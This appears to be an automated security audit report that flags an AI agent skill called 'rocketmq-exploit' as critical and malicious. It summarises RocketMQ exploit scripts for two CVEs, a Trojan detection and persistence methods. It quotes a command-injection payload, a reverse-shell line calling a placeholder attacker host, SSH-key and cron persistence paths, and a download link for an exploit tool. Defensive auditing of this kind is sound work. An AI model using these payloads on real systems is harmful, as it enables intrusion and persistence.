rocketmq-exploit
Fail
Audited by Gen Agent Trust Hub on Apr 22, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSDATA_EXFILTRATION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill provides ready-to-use Python exploit scripts for CVE-2023-33246 (Broker Command Injection) and CVE-2023-37582 (NameServer Arbitrary File Write). These scripts are designed to execute arbitrary code on remote targets.
- Evidence:
references/cve-2023-33246-broker-rce.mdandreferences/cve-2023-37582-namesrv-write.mdcontain full exploit implementations. - [COMMAND_EXECUTION]: The skill contains specific payloads for executing bash commands on targets, including techniques to bypass restrictions and execute reverse shells.
- Evidence: Payloads like
rocketmqHome=-c $@|sh . echo <COMMAND>;and crontab entries for reverse shells (bash -i >& /dev/tcp/ATTACKER/PORT 0>&1) are documented. - [EXTERNAL_DOWNLOADS]: Instructions are provided to download and execute an external Java exploit tool (
rocketmq-attack-1.1-SNAPSHOT.jar) from a third-party GitHub repository not associated with a trusted vendor. - Evidence:
references/detection-and-tools.mdreferenceshttps://github.com/vulhub/rocketmq-attack/releases. - [DATA_EXFILTRATION]: Includes tools and methodology to leak sensitive cluster information from RocketMQ Dashboard and Broker instances without authentication.
- Evidence:
check_dashboardfunction inreferences/detection-and-tools.mdspecifically targets/cluster/list.queryfor information disclosure. - [PERSISTENCE]: The skill provides detailed methods for achieving persistence on a compromised system by writing SSH authorized keys or creating malicious cron jobs.
- Evidence: Explicit examples for writing to
/root/.ssh/authorized_keysand/var/spool/cron/rootare provided in the usage sections. - [MALICIOUS_DETECTION]: Automated AV scanners confirmed that
references/cve-2023-33246-broker-rce.mdcontains a Trojan (Python:Agent-RX [Trj]), and YARA scans detected reverse shell patterns in multiple files.
Recommendations
- CRITICAL: 1 infected file(s) detected - DO NOT USE
- AI detected serious security threats
Audit Metadata